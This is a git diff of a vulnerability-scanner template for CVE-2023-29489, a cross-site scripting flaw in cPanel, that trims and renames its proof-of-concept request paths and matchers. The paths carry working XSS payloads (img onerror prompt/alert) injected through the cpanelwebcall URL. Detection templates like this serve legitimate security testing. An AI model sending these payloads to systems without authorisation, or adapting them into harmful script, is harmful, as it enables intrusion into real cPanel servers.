diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml
index d64fb866a0..5b3e98c1f8 100644
--- a/http/cves/2023/CVE-2023-29489.yaml
+++ b/http/cves/2023/CVE-2023-29489.yaml
@@ -1,8 +1,8 @@
 id: CVE-2023-29489
 
 info:
-  name: cPanel - Cross-Site Scripting
-  author: DhiyaneshDk, 0xKayala
+  name: cPanel < 11.109.9999.116 - Cross-Site Scripting
+  author: DhiyaneshDk,0xKayala
   severity: medium
   description: |
     An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
@@ -36,17 +36,15 @@ http:
   - method: GET
     path:
       - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
-      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
-      - '{{BaseURL}}/cpanelwebcall/<><img%20src=1%20onerror=alert("XSS-POC-by-0xKayala")>'
+      - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
-          - '<img src=x onerror="prompt(1)">aaaaaaaaaaaa'
-          - '<><img src=1 onerror=alert("XSS-POC-by-0xKayala")>'
           - 'Invalid webcall ID:'
         condition: and